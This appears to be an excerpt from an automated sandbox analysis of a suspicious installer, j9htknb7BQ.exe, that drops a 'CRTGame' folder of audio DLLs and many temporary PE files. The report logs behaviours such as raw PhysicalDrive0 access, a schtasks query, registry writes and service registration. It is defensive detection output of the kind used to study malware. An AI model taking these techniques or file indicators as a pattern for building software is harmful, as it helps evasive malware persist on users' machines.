Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-0H0B1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-768F1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-PE6Q4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-8KTA3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\uninstall\is-0C5FH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-15SLJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-NFQ3O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-FLPRF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-M9NVL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-DSQCO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-THT99.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-N90RR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-US51G.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-89IOF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)
Source: C:\Users\user\Desktop\j9htknb7BQ.exe -- File created: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\is-9BPGE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- File created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)

Boot Survival

Source: C:\Program Files (x86)\CRTGame\crtgame.exe -- Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 -- 5_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exe -- Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 -- 7_2_02BCF29C
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
Source: C:\Program Files (x86)\CRTGame\crtgame.exe -- Code function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA, -- 5_2_004026F0
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, -- 1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus, -- 1_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_004241A4 IsIconic,SetActiveWindow, -- 1_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, -- 1_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, -- 1_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_004175A8 IsIconic,GetCapture, -- 1_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_00417CDE IsIconic,SetWindowPos, -- 1_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, -- 1_2_00417CE0
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Code function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, -- 1_2_00481CB0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
Source: C:\Users\user\Desktop\j9htknb7BQ.exe -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\CRTGame\crtgame.exe -- Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, -- 5_2_00401B54
Source: C:\Program Files (x86)\CRTGame\crtgame.exe -- Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, -- 7_2_02BCF3A0
Source: C:\Program Files (x86)\CRTGame\crtgame.exe -- Window / User API: threadDelayed 9675
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-15Q83.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-U01MD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MGR1O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LCCKT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2DM26.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-INJF5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-0B8UA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-R3T6A.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-4DA3B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-R3MEC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6AF6U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NTP22.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-4L1QL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QASVM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RV1NR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PC991.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1L7JU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LKN3T.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-J4G02.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-TN6ID.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1GFJF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-7M8GD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V1IHP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RRVDV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-53LMN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-Q99K1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-O2JHA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-I69V3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KJFHV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-0H0B1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-768F1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PE6Q4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8KTA3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-0C5FH.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-15SLJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
